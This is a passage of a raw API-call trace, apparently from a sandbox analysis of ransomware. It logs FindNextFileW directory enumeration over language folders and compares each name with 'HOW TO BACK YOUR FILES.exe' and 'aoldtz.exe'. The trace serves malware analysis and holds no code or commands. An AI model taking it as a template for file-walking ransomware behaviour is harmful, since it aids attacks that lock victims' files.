ftCreationTime.dwLowDateTime=0x82752420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0101.165] lstrcmpiW (lpString1="id", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.165] lstrcmpiW (lpString1="id", lpString2="aoldtz.exe") returned 1 [0101.165] lstrcpyW (in: lpString1=0x2cce518, lpString2="id" | out: lpString1="id") returned="id" [0101.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0101.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1990 [0101.165] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2408 | out: ListHead=0x2e7710, ListEntry=0x2d2408) returned 0x2d23e8 [0101.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82759950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0101.165] lstrcmpiW (lpString1="it", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.165] lstrcmpiW (lpString1="it", lpString2="aoldtz.exe") returned 1 [0101.166] lstrcpyW (in: lpString1=0x2cce518, lpString2="it" | out: lpString1="it") returned="it" [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1ab8 [0101.166] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2428 | out: ListHead=0x2e7710, ListEntry=0x2d2428) returned 0x2d2408 [0101.166] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82763590, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0101.166] lstrcmpiW (lpString1="ja", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.166] lstrcmpiW (lpString1="ja", lpString2="aoldtz.exe") returned 1 [0101.166] lstrcpyW (in: lpString1=0x2cce518, lpString2="ja" | out: lpString1="ja") returned="ja" [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1be0 [0101.166] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2448 | out: ListHead=0x2e7710, ListEntry=0x2d2448) returned 0x2d2428 [0101.166] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8276d1d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e501700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e501700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0101.166] lstrcmpiW (lpString1="ko", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.166] lstrcmpiW (lpString1="ko", lpString2="aoldtz.exe") returned 1 [0101.166] lstrcpyW (in: lpString1=0x2cce518, lpString2="ko" | out: lpString1="ko") returned="ko" [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2520 [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1d08 [0101.166] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2528 | out: ListHead=0x2e7710, ListEntry=0x2d2528) returned 0x2d2448 [0101.166] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82776e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0101.166] lstrcmpiW (lpString1="lt", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.166] lstrcmpiW (lpString1="lt", lpString2="aoldtz.exe") returned 1 [0101.166] lstrcpyW (in: lpString1=0x2cce518, lpString2="lt" | out: lpString1="lt") returned="lt" [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0101.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1e30 [0101.167] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2468 | out: ListHead=0x2e7710, ListEntry=0x2d2468) returned 0x2d2528 [0101.167] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8277e340, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0101.167] lstrcmpiW (lpString1="lv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.167] lstrcmpiW (lpString1="lv", lpString2="aoldtz.exe") returned 1 [0101.167] lstrcpyW (in: lpString1=0x2cce518, lpString2="lv" | out: lpString1="lv") returned="lv" [0101.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2480 [0101.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1f58 [0101.167] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2488 | out: ListHead=0x2e7710, ListEntry=0x2d2488) returned 0x2d2468 [0101.167] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82787f80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb", cAlternateFileName="")) returned 1 [0101.167] lstrcmpiW (lpString1="nb", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.167] lstrcmpiW (lpString1="nb", lpString2="aoldtz.exe") returned 1 [0101.167] lstrcpyW (in: lpString1=0x2cce518, lpString2="nb" | out: lpString1="nb") returned="nb" [0101.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0101.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e2080 [0101.167] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2348 | out: ListHead=0x2e7710, ListEntry=0x2d2348) returned 0x2d2488 [0101.167] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82791bc0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4db5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4db5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0101.167] lstrcmpiW (lpString1="nl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.167] lstrcmpiW (lpString1="nl", lpString2="aoldtz.exe") returned 1 [0101.167] lstrcpyW (in: lpString1=0x2cce518, lpString2="nl" | out: lpString1="nl") returned="nl" [0101.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25c0 [0101.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e21a8 [0101.167] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25c8 | out: ListHead=0x2e7710, ListEntry=0x2d25c8) returned 0x2d2348 [0101.167] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8279b800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0101.167] lstrcmpiW (lpString1="pl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.167] lstrcmpiW (lpString1="pl", lpString2="aoldtz.exe") returned 1 [0101.168] lstrcpyW (in: lpString1=0x2cce518, lpString2="pl" | out: lpString1="pl") returned="pl" [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e22d0 [0101.168] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d22e8 | out: ListHead=0x2e7710, ListEntry=0x2d22e8) returned 0x2d25c8 [0101.168] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827a2d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0101.168] lstrcmpiW (lpString1="pt_BR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.168] lstrcmpiW (lpString1="pt_BR", lpString2="aoldtz.exe") returned 1 [0101.168] lstrcpyW (in: lpString1=0x2cce518, lpString2="pt_BR" | out: lpString1="pt_BR") returned="pt_BR" [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2540 [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x124) returned 0x337238 [0101.168] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2548 | out: ListHead=0x2e7710, ListEntry=0x2d2548) returned 0x2d22e8 [0101.168] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827aa260, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0101.168] lstrcmpiW (lpString1="pt_PT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.168] lstrcmpiW (lpString1="pt_PT", lpString2="aoldtz.exe") returned 1 [0101.168] lstrcpyW (in: lpString1=0x2cce518, lpString2="pt_PT" | out: lpString1="pt_PT") returned="pt_PT" [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24c0 [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x124) returned 0x337370 [0101.168] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d24c8 | out: ListHead=0x2e7710, ListEntry=0x2d24c8) returned 0x2d2548 [0101.168] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827b3ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e4b5440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e4b5440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0101.168] lstrcmpiW (lpString1="ro", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.168] lstrcmpiW (lpString1="ro", lpString2="aoldtz.exe") returned 1 [0101.168] lstrcpyW (in: lpString1=0x2cce518, lpString2="ro" | out: lpString1="ro") returned="ro" [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24e0 [0101.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e23f8 [0101.168] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d24e8 | out: ListHead=0x2e7710, ListEntry=0x2d24e8) returned 0x2d24c8 [0101.169] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827c7720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0101.169] lstrcmpiW (lpString1="ru", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.169] lstrcmpiW (lpString1="ru", lpString2="aoldtz.exe") returned 1 [0101.169] lstrcpyW (in: lpString1=0x2cce518, lpString2="ru" | out: lpString1="ru") returned="ru" [0101.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2500 [0101.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e2520 [0101.169] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2508 | out: ListHead=0x2e7710, ListEntry=0x2d2508) returned 0x2d24e8 [0101.169] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827e4be0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0101.169] lstrcmpiW (lpString1="sk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.169] lstrcmpiW (lpString1="sk", lpString2="aoldtz.exe") returned 1 [0101.169] lstrcpyW (in: lpString1=0x2cce518, lpString2="sk" | out: lpString1="sk") returned="sk" [0101.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2640 [0101.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x324fc8 [0101.169] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2648 | out: ListHead=0x2e7710, ListEntry=0x2d2648) returned 0x2d2508 [0101.169] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827f5d50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0101.169] lstrcmpiW (lpString1="sl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.169] lstrcmpiW (lpString1="sl", lpString2="aoldtz.exe") returned 1 [0101.169] lstrcpyW (in: lpString1=0x2cce518, lpString2="sl" | out: lpString1="sl") returned="sl" [0101.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2660 [0101.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x3250f0 [0101.169] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2668 | out: ListHead=0x2e7710, ListEntry=0x2d2668) returned 0x2d2648 [0101.169] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828095d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e48f2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e48f2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sr", cAlternateFileName="")) returned 1 [0101.169] lstrcmpiW (lpString1="sr", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.169] lstrcmpiW (lpString1="sr", lpString2="aoldtz.exe") returned 1 [0101.169] lstrcpyW (in: lpString1=0x2cce518, lpString2="sr" | out: lpString1="sr") returned="sr" [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2680 [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x325218 [0101.170] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2688 | out: ListHead=0x2e7710, ListEntry=0x2d2688) returned 0x2d2668 [0101.170] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8282b8b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0101.170] lstrcmpiW (lpString1="sv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.170] lstrcmpiW (lpString1="sv", lpString2="aoldtz.exe") returned 1 [0101.170] lstrcpyW (in: lpString1=0x2cce518, lpString2="sv" | out: lpString1="sv") returned="sv" [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d26a0 [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x325340 [0101.170] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d26a8 | out: ListHead=0x2e7710, ListEntry=0x2d26a8) returned 0x2d2688 [0101.170] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8284db90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0101.170] lstrcmpiW (lpString1="th", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.170] lstrcmpiW (lpString1="th", lpString2="aoldtz.exe") returned 1 [0101.170] lstrcpyW (in: lpString1=0x2cce518, lpString2="th" | out: lpString1="th") returned="th" [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d26c0 [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x325468 [0101.170] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d26c8 | out: ListHead=0x2e7710, ListEntry=0x2d26c8) returned 0x2d26a8 [0101.170] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82863b20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0101.170] lstrcmpiW (lpString1="tr", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.170] lstrcmpiW (lpString1="tr", lpString2="aoldtz.exe") returned 1 [0101.170] lstrcpyW (in: lpString1=0x2cce518, lpString2="tr" | out: lpString1="tr") returned="tr" [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d26e0 [0101.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x325590 [0101.170] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d26e8 | out: ListHead=0x2e7710, ListEntry=0x2d26e8) returned 0x2d26c8 [0101.170] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8286b050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0101.171] lstrcmpiW (lpString1="uk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.171] lstrcmpiW (lpString1="uk", lpString2="aoldtz.exe") returned 1 [0101.171] lstrcpyW (in: lpString1=0x2cce518, lpString2="uk" | out: lpString1="uk") returned="uk" [0101.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2700 [0101.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x3256b8 [0101.171] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2708 | out: ListHead=0x2e7710, ListEntry=0x2d2708) returned 0x2d26e8 [0101.171] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82872580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e469180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e469180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0101.171] lstrcmpiW (lpString1="vi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.171] lstrcmpiW (lpString1="vi", lpString2="aoldtz.exe") returned 1 [0101.171] lstrcpyW (in: lpString1=0x2cce518, lpString2="vi" | out: lpString1="vi") returned="vi" [0101.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2720 [0101.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x3257e0 [0101.171] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2728 | out: ListHead=0x2e7710, ListEntry=0x2d2728) returned 0x2d2708 [0101.171] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82879ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e443020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0101.171] lstrcmpiW (lpString1="zh_CN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.171] lstrcmpiW (lpString1="zh_CN", lpString2="aoldtz.exe") returned 1 [0101.171] lstrcpyW (in: lpString1=0x2cce518, lpString2="zh_CN" | out: lpString1="zh_CN") returned="zh_CN" [0101.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2740 [0101.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x124) returned 0x3374a8 [0101.171] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2748 | out: ListHead=0x2e7710, ListEntry=0x2d2748) returned 0x2d2728 [0101.171] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828836f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e443020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0101.171] lstrcmpiW 